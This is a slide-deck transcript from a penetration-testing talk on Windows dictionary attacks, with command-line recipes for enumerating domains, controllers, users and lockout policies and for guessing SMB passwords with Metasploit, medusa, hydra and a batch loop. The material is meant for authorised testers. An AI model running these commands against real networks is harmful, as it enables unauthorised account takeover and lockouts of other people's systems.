Introduction to Windows Dictionary Attacks
3 likes4,047 views
The document discusses the principles and procedures of Windows dictionary attacks, detailing the identification of weak passwords and unauthorized access risks. It outlines methods for enumerating domain users and policies, creating effective dictionaries, and provides tools for conducting attacks while stressing the importance of respecting lockout policies. The speaker, Scott Sutherland, emphasizes a systematic approach for penetration testers and security professionals to enhance their practices.
![Enumerate Domain Users: Tools 2
Methods Tools Auth
adfind -b DC=<victim>,DC=<com> -f
LDAP Queries “objectcategory=user” -gc | grep -i
Yes
“sAMAccountName:” | gawk -F “:” “{print $2}” | gawk &
-F ” ” “{print $1}”| sort > domain_users.txt
no
Fuzz parameters with BURP to enumerate domain
Sharepoint users. Example URL below:
Yes
Fuzzing &
https://www.[website].com/sites/[sitename]/_layouts/
userdisp.aspx?Force=True&ID=[2 ] no
Net users /domain > domain_users.txt
NET USERS Yes
Command
wmic /user:<user> /password:<password> /node:<IP
WMI address> domain_users.txt
Yes
Commands](https://image.slidesharecdn.com/introductiontowindowsdictionaryattacks-130222150531-phpapp01/85/Introduction-to-Windows-Dictionary-Attacks-14-320.jpg)
Introduction to Windows Dictionary Attacks
- 1. Introduction to Windows Dictionary Attacks Author: Scott Sutherland
- 2. Who am I? Scott Sutherland • Principal Security Consultant @ NetSPI • Over 10 years of consulting experience • Security researcher: Blogs, white papers, tools etc
- 3. Presentation Goals • Identify the value of dictionary attacks • Provide new penetration testers with a safe approach to Windows dictionary attacks • Provide security professionals with questions they should be asking their contractors
- 4. Before we begin… Dictionary Attack Brute Force Attack
- 5. Why dictionary attacks? What are the goals? • Identify accounts configured with weak or default passwords – “It’s human nature” • Use accounts as entry points during penetration tests What’s the impact? • Unauthorized access to critical: ‒ Systems ‒ Applications ‒ data • User impersonation
- 6. Are There Alternatives? Yes. Approaches typically includes: • Cracking pw hashes offline with: ‒ Pre-computed hash libraries like Rainbow Tables ‒ Brute force and dictionary techniques using tools like Hashcat and John the Ripper • Dumping clear text passwords for interactive sessions with Mimikatz
- 7. Dictionary Attacks: Process Overview Windows Dictionary Attack Process 1. Identify domains 2. Enumerate domain controllers 3. Enumerate domain users 4. Enumerate domain lockout policy 5. Create a dictionary 6. Perform Attack
- 8. Identify Domains: Methods Unauthenticated Methods • DHCP Information • NetBIOS Queries • DNS Queries • Sniffing Network Traffic • Review RDP drop down lists Authenticated Methods • Review the output of the SET command for “USERDNSDOMAIN” • Review the registry for the default domain
- 9. Identify Domains: Tools Method Tools Auth IPCONFIG DHCP Info No NetBIOS Queries NETSTAT –A <IP> No nmap -sL <IP Range> -oA output_rnds DNS Queries No ./reverseraider -r <IP Range> ./dnswalk victem.com perl fierce.pl -dns <domainname> -threads 5 -file <domainame>-dns.output Wireshark (GUI) + Filter for browser traffic Sniffing No Network Monitor (GUI) Etherape (GUI) nmap –sS –PN –p3389 <IP Range> RDP Drop Down Then visit with RDP client No
- 10. Enumerate DCs: Methods Unauthenticated Methods • DNS Queries • RPC Queries • Port Scanning • NetBIOS Scanning Authenticated Methods • NET GROUP commands • LDAP Queries
- 11. Enumerate DCs: Tools Methods Tools Auth NSLOOKUP –type=SRV _ldap._tcp.<domain> DNS Queries No NLTEST /DCLIST <domain> RPC Queries FindPDC <domain> <request count> No NMAP –sS –p389,636 –PN <IP Range> Port Scanning No FOR /F “tokens=*” %i in (‘type ips.txt’) do NBTSTAT NetBIOS –A %i No Scanning Net group “Domain Controllers” /domain NET GROUP Yes Command LDAP Administrator (GUI Tool) LDAP Queries Yes Hyena (GUI Tool) & adfind -b -sc dcdmp <domain> -gc | grep -i “>name:” No | gawk -F ” ” “{print $2}” | sort | uniq
- 12. Enumerate Domain Users: Methods Unauthenticated Methods • RPC Queries • SID Brute Forcing • SNMP Queries • LDAP Queries • Sharepoint Fuzzing Authenticated Methods • NET USER command • WMI commands
- 13. Enumerate Domain Users: Tools 1 Methods Tools Auth dumpsec.exe /computer=<IP> /rpt=usersonly RPC /saveas=csv /outfile=domain_users.txt Yes Endpoints & enum –N <ip> no enum –U <ip> ruby c:metasploitmsf3msfcli SID Brute auxiliary/scanner/smb/smb_lookupsid Yes Forcing SMBDomain=. MaxRID=10000 RHOSTS=<IP & Address> E > domain_users.txt no Getacct (GUI) ruby c:metasploitmsf3msfcli SNMP auxiliary/scanner/snmp/snmp_enumusers Yes Queries SMBDomain=. RHOSTS=<IP Address> E & Mibbrowser (GUI) no SNMP Walk
- 14. Enumerate Domain Users: Tools 2 Methods Tools Auth adfind -b DC=<victim>,DC=<com> -f LDAP Queries “objectcategory=user” -gc | grep -i Yes “sAMAccountName:” | gawk -F “:” “{print $2}” | gawk & -F ” ” “{print $1}”| sort > domain_users.txt no Fuzz parameters with BURP to enumerate domain Sharepoint users. Example URL below: Yes Fuzzing & https://www.[website].com/sites/[sitename]/_layouts/ userdisp.aspx?Force=True&ID=[2 ] no Net users /domain > domain_users.txt NET USERS Yes Command wmic /user:<user> /password:<password> /node:<IP WMI address> domain_users.txt Yes Commands
- 15. Get Domain Lockout Policy: Methods Unauthenticated Methods • RPC Endpoints Lockout Authenticated Methods threshold: 5 • NET ACCOUNTS Lockout duration: 15 Command Lockout observation What does it all mean? window : 15 • Threshold, duration, and window
- 16. Get Domain Lockout Policy: Tools Methods Tools Auth RPC Queries Enum –P <IP Address> Yes & dumpsec.exe /computer=<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt No NET ACCOUNTS NET YEs ACCOUNTS COMMAND
- 17. Create a Dictionary: Methods Classics Still Work • Blank • Username as password • password Common Formulas = Most Effective • <Password><Number> • <Companyname><Number> • <Season><Year> • <Sports team>Number> Popular Dictionaries • Metasploit dictionaries • Rock you • FuzzDB • John the ripper
- 18. Create a Dictionary: Tools Dictionary URLs / Lists Blank password Classics Username as password password as password <Password><Number> <Companyname><Number> Formulas <Season><Year> <Sports team>Number> Your Brain! Think of keywords relative to the target company /geographic location and you’ll get more out of your dictionary attacks! http://www.skullsecurity.org/wiki/index.php/Passwords Rockyou http://code.google.com/p/fuzzdb/ FuzzDB https://github.com/rustyrobot/fuzzdb http://www.openwall.com/wordlists/ John the Ripper
- 19. Perform Dictionary Attack: Rules The Rule to Live By: Respect the lockout policy • General idea = Attempt a few passwords for all of the domain users each round, not a 1000 passwords against one user • Subtract 2 attempts from the lockout policy Example: Lockout=5, Attempts=3 • Wait 5 to 10 minutes beyond the observation window
- 20. Perform Dictionary Attack: Tools Tools Commands OS medusa -H hosts.txt -U users.txt -P passwords.txt - Medusa T 20 -t 10 -L -F -M smbnt Linux Easy to use GUI and not CLI that I know of. Bruter Windows ruby c:metasploitmsf3msfcli Metasploit auxiliary/scanner/smb/smb_login THREADS=5 Windows smb_login BLANK_PASSWORDS=true USER_AS_PASS=true and Linux PASS_FILE=c:passwords.txt USER_FILE=c:allusers.txt SMBDomain=. RHOSTS=192.168.1.1 E hydra.exe -L users.txt -P passwords.txt -o Hydra credentials.txt <ip> smb Windows and Linux FOR /F “tokens=*” %a in (‘type passwords.txt’) do Batch Script net user <ip>IPC$ /user:<user> %a Windows
- 21. Conclusions • There is more than one way to do everything! • Enumerate all available options • It’s easy to lockout accounts – respect the password policy • Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests